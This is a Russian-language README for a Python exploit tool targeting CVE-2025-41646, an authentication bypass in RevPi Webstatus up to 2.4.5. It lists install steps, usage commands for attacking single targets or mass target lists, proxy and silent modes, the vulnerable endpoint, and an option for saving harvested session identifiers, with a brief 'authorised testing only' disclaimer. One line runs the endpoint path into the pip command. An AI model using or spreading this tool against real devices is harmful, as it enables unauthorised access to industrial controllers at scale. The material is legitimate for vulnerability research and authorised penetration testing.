
Сценарий эксплойта на Python для CVE-2025-41646, обход аутентификации в RevPi Webstatus <= 2.4.5. Поддерживает одиночную/массовую эксплуатацию, прокси, тихий режим и вывод JSON для тестирования на проникновение.
Это скрипт эксплойта на Python3 для CVE-2025-41646, уязвимости обхода аутентификации, затрагивающей RevPi Webstatus <= 2.4.5.
/php/dal.phppip install -r requirements.txt
requests
urllib3 (обычно идёт вместе с requests)
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100"
python3 cve_2025_41646_auth_bypass.py -l targets.txt
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --proxy "http://127.0.0.1:8080"
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --silent
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --json
запрос/ответ
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования на проникновение. Несанкционированное использование против систем без явного разрешения незаконно.
| Опция | Описание |
|---|
-u, --url | Целевой URL (например, http://IP) |
-l, --list | Файл со списком целей |
-o, --output | Выходной файл для сохранения действительных идентификаторов сессий |
--proxy | Использование прокси (http://127.0.0.1:8080) |
--json | Вывод необработанного JSON |
--silent | Тихий режим (выводит только идентификатор сессии) |